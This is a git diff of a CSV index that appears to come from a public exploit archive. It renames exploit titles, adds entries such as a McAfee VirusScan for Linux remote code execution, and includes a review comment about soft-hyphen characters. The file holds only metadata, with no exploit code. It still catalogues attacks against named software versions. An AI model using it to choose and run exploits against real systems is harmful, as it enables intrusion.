diff --git a/files.csv b/files.csv
index 09fc77181..c2ea9558b 100644
--- a/files.csv
+++ b/files.csv
@@ -3556,7 +3556,7 @@ id,file,description,date,author,platform,type,port
 27925,platforms/linux/dos/27925.txt,"Linux Kernel 2.6.x - Proc dentry_unused Corruption Local Denial of Service",2006-05-31,"Tony Griffiths",linux,dos,0
 27930,platforms/windows/dos/27930.txt,"Microsoft Windows XP/2000/2003 - MHTML URI Buffer Overflow",2006-05-31,Mr.Niega,windows,dos,0
 27942,platforms/hardware/dos/27942.txt,"AVTECH DVR Firmware 1017-1003-1009-1003 - Multiple Vulnerabilities",2013-08-29,"Core Security",hardware,dos,0
-40907,platforms/windows/dos/40907.html,"Microsoft Internet Explorer 9 IEFRAME - CSelection­Interact­Button­Behavior::_Update­Button­Location Use-After-Free (MS13-047)",2016-12-12,Skylined,windows,dos,0
+40907,platforms/windows/dos/40907.html,"Microsoft Internet Explorer 9 - IEFRAME CSelection­Interact­Button­Behavior::_Update­Button­Location Use-After-Free (MS13-047)",2016-12-12,Skylined,windows,dos,0
 27993,platforms/multiple/dos/27993.txt,"FreeType - '.TTF' File Remote Denial of Service",2006-06-08,"Josh Bressers",multiple,dos,0
 27981,platforms/linux/dos/27981.c,"GD Graphics Library 2.0.33 - Remote Denial of Service",2006-06-06,"Xavier Roche",linux,dos,0
 28001,platforms/windows/dos/28001.c,"Microsoft SMB Driver - Local Denial of Service",2006-06-13,"Ruben Santamarta",windows,dos,0
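Review bot: The rewritten description for row 40907 still appears to carry soft-hyphen characters (U+00AD) inside the symbol name, so a plain-text search of the index for `CSelectionInteractButtonBehavior` or `_UpdateButtonLocation` will not match this row. Since the commit is already normalising this title, the invisible characters could be stripped at the same time so the field reads `IEFRAME CSelectionInteractButtonBehavior::_UpdateButtonLocation Use-After-Free (MS13-047)`. The same seems to apply to the unchanged context rows 40896 and 40881 in later hunks.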
@@ -4120,7 +4120,7 @@ id,file,description,date,author,platform,type,port
 32772,platforms/windows/dos/32772.py,"Nokia MultiMedia Player 1.1 - '.m3u' Heap Buffer Overflow",2009-02-03,zer0in,windows,dos,0
 32774,platforms/multiple/dos/32774.txt,"QIP 2005 - Malformed Rich Text Message Remote Denial of Service",2009-02-04,ShineShadow,multiple,dos,0
 32775,platforms/linux/dos/32775.txt,"Linux Kernel 2.6.x - 'make_indexed_dir()' Local Denial of Service",2009-02-16,"Sami Liedes",linux,dos,0
-32800,platforms/linux/dos/32800.txt,"Poppler 0.10.3 - Multiple Denial of Service Vulnerabilities",2009-02-12,Romario,linux,dos,0
+32800,platforms/linux/dos/32800.txt,"Poppler 0.10.3 - Denial of Service",2009-02-12,Romario,linux,dos,0
 32815,platforms/linux/dos/32815.c,"Linux Kernel 2.6.x - Cloned Process 'CLONE_PARENT' Local Origin Validation",2009-02-25,"Chris Evans",linux,dos,0
 32817,platforms/osx/dos/32817.txt,"Apple Safari 4 - Malformed 'feeds:' URI Null Pointer Dereference Remote Denial of Service",2009-02-25,Trancer,osx,dos,0
 32824,platforms/windows/dos/32824.pl,"Internet Download Manager 5.15 Build 3 - Language File Parsing Buffer Overflow",2009-02-27,"musashi karak0rsan",windows,dos,0
@@ -4235,6 +4235,7 @@ id,file,description,date,author,platform,type,port
 33532,platforms/multiple/dos/33532.txt,"Oracle Internet Directory 10.1.2.0.2 - 'oidldapd' Remote Memory Corruption",2006-11-10,Intevydis,multiple,dos,0
 33533,platforms/windows/dos/33533.html,"Gracenote CDDBControl - ActiveX Control 'ViewProfile' Method Heap Buffer Overflow",2010-01-18,karak0rsan,windows,dos,0
 33640,platforms/windows/dos/33640.py,"AIMP 2.8.3 - '.m3u' Remote Stack Buffer Overflow",2010-02-12,Molotov,windows,dos,0
+40913,platforms/android/dos/40913.java,"Samsung Devices KNOX Extensions - OTP Service Heap Overflow",2016-12-13,"Google Security Research",android,dos,0
 33549,platforms/linux/dos/33549.txt,"OpenOffice 3.1 - '.slk' Null Pointer Dereference Remote Denial of Service",2010-01-19,"Hellcode Research",linux,dos,0
 33556,platforms/multiple/dos/33556.rb,"Wireshark CAPWAP Dissector - Denial of Service (Metasploit)",2014-05-28,j0sm1,multiple,dos,5247
 33559,platforms/multiple/dos/33559.txt,"Sun Java System Web Server 7.0 Update 6 - 'admin' Server Denial of Service",2010-01-22,Intevydis,multiple,dos,0
@@ -5302,8 +5303,10 @@ id,file,description,date,author,platform,type,port
 40888,platforms/linux/dos/40888.py,"OpenSSH 7.2 - Denial of Service",2016-12-07,"SecPod Research",linux,dos,0
 40896,platforms/windows/dos/40896.html,"Microsoft Internet Explorer 9 MSHTML - CElement::Has­Flag Memory Corruption",2016-12-09,Skylined,windows,dos,0
 40899,platforms/linux/dos/40899.py,"OpenSSL 1.1.0a/1.1.0b - Denial of Service",2016-12-11,Silverfox,linux,dos,0
-40905,platforms/windows/dos/40905.py,"Serva 3.0.0 HTTP Server - Denial of Service",2016-12-12,LiquidWorm,windows,dos,0
+40905,platforms/windows/dos/40905.py,"Serva 3.0.0 - HTTP Server Denial of Service",2016-12-12,LiquidWorm,windows,dos,0
 40906,platforms/ios/dos/40906.txt,"iOS 10.1.x - Certificate File Memory Corruption",2016-12-12,"Maksymilian Arciemowicz",ios,dos,0
+40910,platforms/hardware/dos/40910.txt,"TP-LINK TD-W8151N - Denial of Service",2016-12-13,"Persian Hack Team",hardware,dos,0
+40914,platforms/android/dos/40914.java,"Samsung Devices KNOX Extensions - OTP TrustZone Trustlet Stack Buffer Overflow",2016-12-13,"Google Security Research",android,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@@ -9673,10 +9676,10 @@ id,file,description,date,author,platform,type,port
 5827,platforms/windows/remote/5827.cpp,"Alt-N SecurityGateway 1.00-1.01 - Remote Stack Overflow",2008-06-15,Heretic2,windows,remote,4000
 5926,platforms/hardware/remote/5926.txt,"Linksys WRT54G (Firmware 1.00.9) - Security Bypass Vulnerabilities (2)",2008-06-24,meathive,hardware,remote,0
 6004,platforms/windows/remote/6004.txt,"Panda Security ActiveScan 2.0 (Update) - Remote Buffer Overflow",2008-07-04,"Karol Wiesek",windows,remote,0
-6012,platforms/windows/remote/6012.php,"CMailServer 5.4.6 - 'CMailCOM.dll' Remote Overwrite (SEH)",2008-07-06,Nine:Situations:Group,windows,remote,80
+6012,platforms/windows/remote/6012.php,"Youngzsoft CMailServer 5.4.6 - 'CMailCOM.dll' Remote Overwrite (SEH)",2008-07-06,Nine:Situations:Group,windows,remote,80
 6013,platforms/osx/remote/6013.pl,"Apple Safari / QuickTime 7.3 - RTSP Content-Type Remote Buffer Overflow",2008-07-06,krafty,osx,remote,0
-6026,platforms/linux/remote/6026.pl,"Trixbox - (langChoice) Local File Inclusion (connect-back) (2)",2008-07-09,"Jean-Michel BESNARD",linux,remote,80
-6045,platforms/linux/remote/6045.py,"Trixbox 2.6.1 - (langChoice) Remote Code Execution (Python)",2008-07-12,muts,linux,remote,80
+6026,platforms/linux/remote/6026.pl,"Fonality trixbox - 'langChoice' Parameter Local File Inclusion (connect-back) (2)",2008-07-09,"Jean-Michel BESNARD",linux,remote,80
+6045,platforms/linux/remote/6045.py,"Fonality trixbox 2.6.1 - 'langChoice' Parameter Remote Code Execution (Python)",2008-07-12,muts,linux,remote,80
 6089,platforms/windows/remote/6089.pl,"Bea Weblogic Apache Connector - Code Execution / Denial of Service",2008-07-17,kingcope,windows,remote,80
 6094,platforms/linux/remote/6094.txt,"Debian OpenSSH - Authenticated Remote SELinux Privilege Elevation Exploit",2008-07-17,eliteboy,linux,remote,0
 6100,platforms/windows/remote/6100.py,"Apache mod_jk 1.2.19 (Windows x86) - Remote Buffer Overflow",2008-07-18,Unohope,windows,remote,80
@@ -12162,8 +12165,8 @@ id,file,description,date,author,platform,type,port
 21452,platforms/windows/remote/21452.txt,"Microsoft Internet Explorer 5.0.1/6.0 - Content-Disposition Handling File Execution",2002-05-15,"Jani Laatikainen",windows,remote,0
 21453,platforms/multiple/remote/21453.txt,"SonicWALL SOHO3 6.3 - Content Blocking Script Injection",2002-05-17,"E M",multiple,remote,0
 21456,platforms/hardware/remote/21456.txt,"Cisco IDS Device Manager 3.1.1 - Arbitrary File Read Access",2002-05-17,"Andrew Lopacki",hardware,remote,0
-21466,platforms/windows/remote/21466.c,"Youngzsoft 3.30/4.0 CMailServer - Buffer Overflow (1)",2002-05-20,anonymous,windows,remote,0
-21467,platforms/windows/remote/21467.c,"Youngzsoft 3.30/4.0 CMailServer - Buffer Overflow (2)",2002-05-21,Over_G,windows,remote,0
+21466,platforms/windows/remote/21466.c,"Youngzsoft CMailServer 3.30/4.0 - Buffer Overflow (1)",2002-05-20,anonymous,windows,remote,0
+21467,platforms/windows/remote/21467.c,"Youngzsoft CMailServer 3.30/4.0 - Buffer Overflow (2)",2002-05-21,Over_G,windows,remote,0
 21468,platforms/windows/remote/21468.pl,"Matu FTP Server 1.13 - Buffer Overflow",2002-05-22,Kanatoko,windows,remote,0
 21469,platforms/windows/remote/21469.txt,"NewAtlanta ServletExec/ISAPI 4.1 - Full Path Disclosure",2002-05-22,"Matt Moore",windows,remote,0
 21470,platforms/windows/remote/21470.txt,"NewAtlanta ServletExec/ISAPI 4.1 - File Disclosure",2002-05-22,"Matt Moore",windows,remote,0
@@ -14932,7 +14935,7 @@ id,file,description,date,author,platform,type,port
 38742,platforms/windows/remote/38742.txt,"Aloaha PDF Suite - Stack Based Buffer Overflow",2013-08-28,"Marcos Accossatto",windows,remote,0
 38764,platforms/hardware/remote/38764.rb,"F5 iControl - 'iCall::Script' Root Command Execution (Metasploit)",2015-11-19,Metasploit,hardware,remote,443
 38766,platforms/multiple/remote/38766.java,"Mozilla Firefox 9.0.1 - Same Origin Policy Security Bypass",2013-09-17,"Takeshi Terada",multiple,remote,0
-38797,platforms/php/remote/38797.rb,"Joomla! Component 'com_contenthistory' - SQL Injection / Remote Code Execution (Metasploit)",2015-11-23,Metasploit,php,remote,80
+38797,platforms/php/remote/38797.rb,"Joomla! 3.4.4 Component Content History - SQL Injection / Remote Code Execution (Metasploit)",2015-11-23,Metasploit,php,remote,80
 38802,platforms/multiple/remote/38802.txt,"Oracle GlassFish Server 2.1.1/3.0.1 - Multiple Subcomponent Resource Identifier Traversal Arbitrary File Access",2013-10-15,"Alex Kouzemtchenko",multiple,remote,0
 38804,platforms/hardware/remote/38804.py,"Multiple Level One Enterprise Access Point Devices - 'backupCfg.cgi' Security Bypass",2013-10-15,"Richard Weinberger",hardware,remote,0
 38805,platforms/multiple/remote/38805.txt,"SAP Sybase Adaptive Server Enterprise - XML External Entity Information Disclosure",2015-11-25,"Igor Bulatenko",multiple,remote,0
@@ -15151,6 +15154,7 @@ id,file,description,date,author,platform,type,port
 40868,platforms/windows/remote/40868.py,"Dup Scout Enterprise 9.1.14 - Buffer Overflow (SEH)",2016-12-05,vportal,windows,remote,0
 40869,platforms/windows/remote/40869.py,"DiskBoss Enterprise 7.4.28 - 'GET' Buffer Overflow",2016-12-05,vportal,windows,remote,0
 40881,platforms/windows/remote/40881.html,"Microsoft Internet Explorer jscript9 - Java­Script­Stack­Walker Memory Corruption (MS15-056)",2016-12-06,Skylined,windows,remote,0
+40911,platforms/linux/remote/40911.py,"McAfee Virus Scan Enterprise for Linux - Remote Code Execution",2016-12-13,"Andrew Fasano",linux,remote,0
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@@ -16875,7 +16879,7 @@ id,file,description,date,author,platform,type,port
 2747,platforms/php/webapps/2747.txt,"MyAlbum 3.02 - (language.inc.php) Remote File Inclusion",2006-11-09,"Silahsiz Kuvvetler",php,webapps,0
 2748,platforms/php/webapps/2748.pl,"PHPManta 1.0.2 - (view-sourcecode.php) Local File Inclusion",2006-11-09,ajann,php,webapps,0
 2750,platforms/php/webapps/2750.txt,"EncapsCMS 0.3.6 - (core/core.php) Remote File Inclusion",2006-11-10,Firewall,php,webapps,0
-2751,platforms/php/webapps/2751.txt,"BrewBlogger 1.3.1 - (printLog.php) SQL Injection",2006-11-10,"Craig Heffner",php,webapps,0
+2751,platforms/php/webapps/2751.txt,"BrewBlogger 1.3.1 - 'printLog.php' SQL Injection",2006-11-10,"Craig Heffner",php,webapps,0
 2752,platforms/php/webapps/2752.txt,"WORK System E-Commerce 3.0.1 - Remote File Inclusion",2006-11-10,SlimTim10,php,webapps,0
 2754,platforms/asp/webapps/2754.pl,"NuCommunity 1.0 - (cl_CatListing.asp) SQL Injection",2006-11-11,ajann,asp,webapps,0
 2755,platforms/asp/webapps/2755.pl,"NuRems 1.0 - (propertysdetails.asp) SQL Injection",2006-11-11,ajann,asp,webapps,0
@@ -16891,13 +16895,13 @@ id,file,description,date,author,platform,type,port
 2765,platforms/asp/webapps/2765.txt,"UPublisher 1.0 - (viewarticle.asp) SQL Injection",2006-11-12,ajann,asp,webapps,0
 2766,platforms/php/webapps/2766.pl,"CMSmelborp Beta - 'user_standard.php' Remote File Inclusion",2006-11-12,DeltahackingTEAM,php,webapps,0
 2767,platforms/php/webapps/2767.txt,"StoryStream 4.0 - 'baseDir' Remote File Inclusion",2006-11-12,v1per-haCker,php,webapps,0
-2768,platforms/php/webapps/2768.txt,"ContentNow 1.30 - (Local File Inclusion / Arbitrary File Upload / Delete) Multiple Vulnerabilities",2006-11-13,r0ut3r,php,webapps,0
+2768,platforms/php/webapps/2768.txt,"ContentNow 1.30 - Local File Inclusion / Arbitrary File Upload/Delete",2006-11-13,r0ut3r,php,webapps,0
 2769,platforms/php/webapps/2769.php,"Quick.Cart 2.0 - (actions_client/gallery.php) Local File Inclusion",2006-11-13,Kacper,php,webapps,0
 2772,platforms/asp/webapps/2772.htm,"Online Event Registration 2.0 - (save_profile.asp) Pass Change Exploit",2006-11-13,ajann,asp,webapps,0
 2773,platforms/asp/webapps/2773.txt,"Estate Agent Manager 1.3 - 'default.asp' Login Bypass",2006-11-13,ajann,asp,webapps,0
 2774,platforms/asp/webapps/2774.txt,"Property Pro 1.0 - (vir_Login.asp) Remote Login Bypass",2006-11-13,ajann,asp,webapps,0
 2775,platforms/php/webapps/2775.txt,"Phpjobscheduler 3.0 - (installed_config_file) File Inclusion",2006-11-13,Firewall,php,webapps,0
-2776,platforms/php/webapps/2776.txt,"ContentNow 1.30 - (Arbitrary File Upload / Cross-Site Scripting) Multiple Vulnerabilities",2006-11-14,Timq,php,webapps,0
+2776,platforms/php/webapps/2776.txt,"ContentNow 1.30 - Arbitrary File Upload / Cross-Site Scripting",2006-11-14,Timq,php,webapps,0
 2777,platforms/php/webapps/2777.txt,"Aigaion 1.2.1 - (DIR) Remote File Inclusion",2006-11-14,navairum,php,webapps,0
 2778,platforms/php/webapps/2778.txt,"PHPPeanuts 1.3 Beta - (Inspect.php) Remote File Inclusion",2006-11-14,"Hidayat Sagita",php,webapps,0
 2779,platforms/asp/webapps/2779.txt,"ASP Smiley 1.0 - 'default.asp' Login Bypass (SQL Injection)",2006-11-14,ajann,asp,webapps,0
@@ -16924,7 +16928,7 @@ id,file,description,date,author,platform,type,port
 2818,platforms/php/webapps/2818.txt,"e-Ark 1.0 - (src/ark_inc.php) Remote File Inclusion",2006-11-21,DeltahackingTEAM,php,webapps,0
 2819,platforms/php/webapps/2819.txt,"LDU 8.x - (avatarselect id) SQL Injection",2006-11-21,nukedx,php,webapps,0
 2820,platforms/php/webapps/2820.txt,"Seditio 1.10 - (avatarselect id) SQL Injection",2006-11-21,nukedx,php,webapps,0
-2822,platforms/php/webapps/2822.pl,"ContentNow 1.39 - (pageid) SQL Injection",2006-11-21,Revenge,php,webapps,0
+2822,platforms/php/webapps/2822.pl,"ContentNow 1.39 - 'pageid' Parameter SQL Injection",2006-11-21,Revenge,php,webapps,0
 2823,platforms/php/webapps/2823.txt,"aBitWhizzy - 'abitwhizzy.php' Information Disclosure",2006-11-21,"Security Access Point",php,webapps,0
 2826,platforms/php/webapps/2826.txt,"Pearl Forums 2.4 - Multiple Remote File Inclusion",2006-11-21,3l3ctric-Cracker,php,webapps,0
 2827,platforms/php/webapps/2827.txt,"phpPC 1.04 - Multiple Remote File Inclusion",2006-11-21,iss4m,php,webapps,0
@@ -17222,7 +17226,7 @@ id,file,description,date,author,platform,type,port
 3281,platforms/php/webapps/3281.txt,"WebMatic 2.6 - (index_album.php) Remote File Inclusion",2007-02-07,MadNet,php,webapps,0
 3282,platforms/php/webapps/3282.pl,"Advanced Poll 2.0.5-dev - Remote Admin Session Generator Exploit",2007-02-07,diwou,php,webapps,0
 3283,platforms/php/webapps/3283.txt,"otscms 2.1.5 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2007-02-07,GregStar,php,webapps,0
-3284,platforms/php/webapps/3284.txt,"Maian Recipe 1.0 - (path_to_folder) Remote File Inclusion",2007-02-07,Denven,php,webapps,0
+3284,platforms/php/webapps/3284.txt,"Maian Recipe 1.0 - 'path_to_folder' Parameter Remote File Inclusion",2007-02-07,Denven,php,webapps,0
 3285,platforms/php/webapps/3285.htm,"Site-Assistant 0990 - (paths[version]) Remote File Inclusion",2007-02-08,ajann,php,webapps,0
 3286,platforms/php/webapps/3286.asp,"LightRO CMS 1.0 - (index.php projectid) SQL Injection",2007-02-08,ajann,php,webapps,0
 3287,platforms/php/webapps/3287.asp,"LushiNews 1.01 - 'comments.php' SQL Injection",2007-02-08,ajann,php,webapps,0
@@ -17444,7 +17448,7 @@ id,file,description,date,author,platform,type,port
 3663,platforms/php/webapps/3663.htm,"XOOPS Module WF-Snippets 1.02 (c) - Blind SQL Injection",2007-04-04,ajann,php,webapps,0
 3665,platforms/php/webapps/3665.htm,"Mutant 0.9.2 - mutant_functions.php Remote File Inclusion",2007-04-04,bd0rk,php,webapps,0
 3666,platforms/php/webapps/3666.pl,"XOOPS Module Rha7 Downloads 1.0 - (visit.php) SQL Injection",2007-04-04,ajann,php,webapps,0
-3667,platforms/php/webapps/3667.txt,"Sisplet CMS 05.10 - (site_path) Remote File Inclusion",2007-04-05,kezzap66345,php,webapps,0
+3667,platforms/php/webapps/3667.txt,"Sisplet CMS 05.10 - 'site_path' Parameter Remote File Inclusion",2007-04-05,kezzap66345,php,webapps,0
 3668,platforms/php/webapps/3668.txt,"CodeWand phpBrowse - (site_path) Remote File Inclusion",2007-04-05,kezzap66345,php,webapps,0
 3669,platforms/php/webapps/3669.txt,"PHP-Generics 1.0.0 Beta - Multiple Remote File Inclusion",2007-04-05,bd0rk,php,webapps,0
 3670,platforms/php/webapps/3670.txt,"XOOPS Module WF-Links 1.03 - 'cid' SQL Injection",2007-04-05,ajann,php,webapps,0
@@ -19075,84 +19079,84 @@ id,file,description,date,author,platform,type,port
 5981,platforms/php/webapps/5981.txt,"HIOX Banner Rotator 1.3 - 'hm' Parameter Remote File Inclusion",2008-06-30,"Ghost Hacker",php,webapps,0
 5982,platforms/php/webapps/5982.txt,"PHP-Agenda 2.2.4 - 'index.php' Local File Inclusion",2008-07-01,StAkeR,php,webapps,0
 5983,platforms/php/webapps/5983.txt,"CAT2 - 'spaw_root' Parameter Local File Inclusion",2008-07-01,StAkeR,php,webapps,0
-5984,platforms/php/webapps/5984.txt,"Sisplet CMS - 'index.php id' 2008-01-24 SQL Injection",2008-07-01,"CWH Underground",php,webapps,0
-5985,platforms/php/webapps/5985.txt,"VanGogh Web CMS 0.9 - (article_ID) SQL Injection",2008-07-01,"CWH Underground",php,webapps,0
+5984,platforms/php/webapps/5984.txt,"Sisplet CMS 2008-01-24 - 'id' Parameter SQL Injection",2008-07-01,"CWH Underground",php,webapps,0
+5985,platforms/php/webapps/5985.txt,"VanGogh Web CMS 0.9 - 'article_ID' Parameter SQL Injection",2008-07-01,"CWH Underground",php,webapps,0
 5986,platforms/php/webapps/5986.php,"PHP-Nuke Platinium 7.6.b.5 - Remote Code Execution",2008-07-01,"Charles Fol",php,webapps,0
-5987,platforms/php/webapps/5987.txt,"Efestech Shop 2.0 - 'cat_id' SQL Injection",2008-07-01,Kacak,php,webapps,0
-5988,platforms/php/webapps/5988.txt,"plx Ad Trader 3.2 - (adid) SQL Injection",2008-07-01,"Hussin X",php,webapps,0
-5989,platforms/php/webapps/5989.txt,"Joomla! Component versioning 1.0.2 - 'id' SQL Injection",2008-07-01,"DarkMatter Crew",php,webapps,0
-5990,platforms/php/webapps/5990.txt,"Joomla! Component mygallery - 'cid' SQL Injection",2008-07-01,Houssamix,php,webapps,0
-5991,platforms/php/webapps/5991.txt,"XchangeBoard 1.70 - (boardID) SQL Injection",2008-07-02,haZl0oh,php,webapps,0
-5992,platforms/php/webapps/5992.txt,"CMS little 0.0.1 - (index.php template) Local File Inclusion",2008-07-02,"CWH Underground",php,webapps,0
-5993,platforms/php/webapps/5993.txt,"Joomla! Component com_brightweblinks - 'catid' SQL Injection",2008-07-02,His0k4,php,webapps,0
+5987,platforms/php/webapps/5987.txt,"Efestech Shop 2.0 - 'cat_id' Parameter SQL Injection",2008-07-01,Kacak,php,webapps,0
+5988,platforms/php/webapps/5988.txt,"plx Ad Trader 3.2 - 'adid' Parameter SQL Injection",2008-07-01,"Hussin X",php,webapps,0
+5989,platforms/php/webapps/5989.txt,"Joomla! Component versioning 1.0.2 - 'id' Parameter SQL Injection",2008-07-01,"DarkMatter Crew",php,webapps,0
+5990,platforms/php/webapps/5990.txt,"Joomla! Component mygallery - 'cid' Parameter SQL Injection",2008-07-01,Houssamix,php,webapps,0
+5991,platforms/php/webapps/5991.txt,"XchangeBoard 1.70 - 'boardID' Parameter SQL Injection",2008-07-02,haZl0oh,php,webapps,0
+5992,platforms/php/webapps/5992.txt,"CMS little 0.0.1 - 'template' Parameter Local File Inclusion",2008-07-02,"CWH Underground",php,webapps,0
+5993,platforms/php/webapps/5993.txt,"Joomla! Component Brightcode Weblinks - 'catid' Parameter SQL Injection",2008-07-02,His0k4,php,webapps,0
 5994,platforms/php/webapps/5994.pl,"Joomla! Component QuickTime VR 0.1 - SQL Injection",2008-07-02,Houssamix,php,webapps,0
 5995,platforms/php/webapps/5995.pl,"Joomla! Component is 1.0.1 - Multiple SQL Injections",2008-07-02,Houssamix,php,webapps,0
-5996,platforms/php/webapps/5996.txt,"phPortal 1.2 - Multiple Remote File Inclusions",2008-07-02,Ciph3r,php,webapps,0
+5996,platforms/php/webapps/5996.txt,"PHPortal 1.2 - Multiple Remote File Inclusions",2008-07-02,Ciph3r,php,webapps,0
 5997,platforms/php/webapps/5997.pl,"CMS WebBlizzard - 'index.php' Blind SQL Injection",2008-07-03,Bl@ckbe@rD,php,webapps,0
-5998,platforms/php/webapps/5998.txt,"phpWebNews 0.2 MySQL Edition - (id_kat) SQL Injection",2008-07-03,storm,php,webapps,0
-5999,platforms/php/webapps/5999.txt,"phpWebNews 0.2 MySQL Edition - (det) SQL Injection",2008-07-03,"Virangar Security",php,webapps,0
-6000,platforms/php/webapps/6000.txt,"pHNews CMS - Multiple Local File Inclusion",2008-07-03,CraCkEr,php,webapps,0
+5998,platforms/php/webapps/5998.txt,"PHPwebnews 0.2 MySQL Edition - 'id_kat' Parameter SQL Injection",2008-07-03,storm,php,webapps,0
+5999,platforms/php/webapps/5999.txt,"PHPwebnews 0.2 MySQL Edition - 'det' Parameter SQL Injection",2008-07-03,"Virangar Security",php,webapps,0
+6000,platforms/php/webapps/6000.txt,"pHNews CMS Alpha 1 - Local File Inclusion",2008-07-03,CraCkEr,php,webapps,0
 6001,platforms/php/webapps/6001.txt,"1024 CMS 1.4.4 - Multiple Remote / Local File Inclusion",2008-07-04,DSecRG,php,webapps,0
 6002,platforms/php/webapps/6002.pl,"Joomla! Component altas 1.0 - Multiple SQL Injections",2008-07-04,Houssamix,php,webapps,0
 6003,platforms/php/webapps/6003.txt,"Joomla! Component DBQuery 1.4.1.1 - Remote File Inclusion",2008-07-04,SsEs,php,webapps,0
 6005,platforms/php/webapps/6005.php,"Site@School 2.4.10 - 'FCKeditor' Session Hijacking / Arbitrary File Upload",2008-07-04,EgiX,php,webapps,0
 6006,platforms/php/webapps/6006.php,"Thelia 1.3.5 - Multiple Vulnerabilities",2008-07-05,BlackH,php,webapps,0
-6007,platforms/php/webapps/6007.txt,"Kasseler CMS 1.3.0 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2008-07-05,Cr@zy_King,php,webapps,0
+6007,platforms/php/webapps/6007.txt,"Kasseler CMS 1.3.0 - Local File Inclusion / Cross-Site Scripting",2008-07-05,Cr@zy_King,php,webapps,0
 6008,platforms/php/webapps/6008.php,"ImperialBB 2.3.5 - Arbitrary File Upload",2008-07-05,PHPLizardo,php,webapps,0
 6009,platforms/php/webapps/6009.pl,"Fuzzylime CMS 3.01 - Remote Command Execution",2008-07-05,Ams,php,webapps,0
-6010,platforms/php/webapps/6010.txt,"XPOZE Pro 3.06 - 'uid' SQL Injection",2008-07-06,"HIva Team",php,webapps,0
-6011,platforms/php/webapps/6011.txt,"ContentNow 1.4.1 - (Arbitrary File Upload / Cross-Site Scripting) Multiple Vulnerabilities",2008-07-06,"CWH Underground",php,webapps,0
-6014,platforms/php/webapps/6014.txt,"SmartPPC Pay Per Click Script - '&idDirectory=' Blind SQL Injection (1)",2008-07-07,Hamtaro,php,webapps,0
+6010,platforms/php/webapps/6010.txt,"XPOZE Pro 3.06 - 'uid' Parameter SQL Injection",2008-07-06,"HIva Team",php,webapps,0
+6011,platforms/php/webapps/6011.txt,"ContentNow 1.4.1 - Arbitrary File Upload / Cross-Site Scripting",2008-07-06,"CWH Underground",php,webapps,0
+6014,platforms/php/webapps/6014.txt,"SmartPPC Pay Per Click Script - 'idDirectory' Blind SQL Injection (1)",2008-07-07,Hamtaro,php,webapps,0
 6015,platforms/php/webapps/6015.txt,"WebXell Editor 0.1.3 - Arbitrary File Upload",2008-07-07,"CWH Underground",php,webapps,0
-6016,platforms/php/webapps/6016.pl,"Fuzzylime CMS 3.01a - (file) Local File Inclusion",2008-07-07,Cod3rZ,php,webapps,0
-6017,platforms/php/webapps/6017.pl,"Triton CMS Pro - (x-forwarded-for) Blind SQL Injection",2008-07-07,girex,php,webapps,0
-6018,platforms/php/webapps/6018.pl,"Neutrino 0.8.4 Atomic Edition - Remote Code Execution",2008-07-07,Ams,php,webapps,0
-6019,platforms/php/webapps/6019.pl,"SmartPPC Pay Per Click Script - '&idDirectory=' Blind SQL Injection (2)",2008-07-07,ka0x,php,webapps,0
+6016,platforms/php/webapps/6016.pl,"Fuzzylime CMS 3.01a - 'file' Parameter Local File Inclusion",2008-07-07,Cod3rZ,php,webapps,0
+6017,platforms/php/webapps/6017.pl,"Triton CMS Pro 1.06 - 'x-forwarded-for' Blind SQL Injection",2008-07-07,girex,php,webapps,0
+6018,platforms/php/webapps/6018.pl,"QNX Neutrino 0.8.4 Atomic Edition - Remote Code Execution",2008-07-07,Ams,php,webapps,0
+6019,platforms/php/webapps/6019.pl,"SmartPPC Pay Per Click Script - 'idDirectory' Blind SQL Injection (2)",2008-07-07,ka0x,php,webapps,0
 6021,platforms/php/webapps/6021.txt,"Mole Group Hotel Script 1.0 - SQL Injection",2008-07-08,t0pP8uZz,php,webapps,0
 6022,platforms/php/webapps/6022.txt,"Mole Group Real Estate Script 1.1 - SQL Injection",2008-07-08,t0pP8uZz,php,webapps,0
 6023,platforms/php/webapps/6023.pl,"BrewBlogger 2.1.0.1 - Arbitrary Add Admin",2008-07-08,"CWH Underground",php,webapps,0
 6024,platforms/php/webapps/6024.txt,"Boonex Dolphin 6.1.2 - Multiple Remote File Inclusion",2008-07-08,RoMaNcYxHaCkEr,php,webapps,0
-6025,platforms/php/webapps/6025.txt,"Joomla! Component com_content 1.0.0 - 'itemID' SQL Injection",2008-07-08,unknown_styler,php,webapps,0
+6025,platforms/php/webapps/6025.txt,"Joomla! Component Content 1.0.0 - 'itemID' Parameter SQL Injection",2008-07-08,unknown_styler,php,webapps,0
 6027,platforms/php/webapps/6027.txt,"Mole Group Last Minute Script 4.0 - SQL Injection",2008-07-08,t0pP8uZz,php,webapps,0
-6028,platforms/php/webapps/6028.txt,"BoonEx Ray 3.5 - (sIncPath) Remote File Inclusion",2008-07-08,RoMaNcYxHaCkEr,php,webapps,0
+6028,platforms/php/webapps/6028.txt,"BoonEx Ray 3.5 - 'sIncPath' Parameter Remote File Inclusion",2008-07-08,RoMaNcYxHaCkEr,php,webapps,0
 6033,platforms/php/webapps/6033.pl,"AuraCMS 2.2.2 - 'pages_data.php' Arbitrary Edit/Add/Delete Exploit",2008-07-09,k1tk4t,php,webapps,0
-6034,platforms/php/webapps/6034.txt,"DreamPics Builder - (page) SQL Injection",2008-07-09,"Hussin X",php,webapps,0
-6035,platforms/php/webapps/6035.txt,"DreamNews Manager - 'id' SQL Injection",2008-07-10,"Hussin X",php,webapps,0
-6036,platforms/php/webapps/6036.txt,"gapicms 9.0.2 - (dirDepth) Remote File Inclusion",2008-07-10,"Ghost Hacker",php,webapps,0
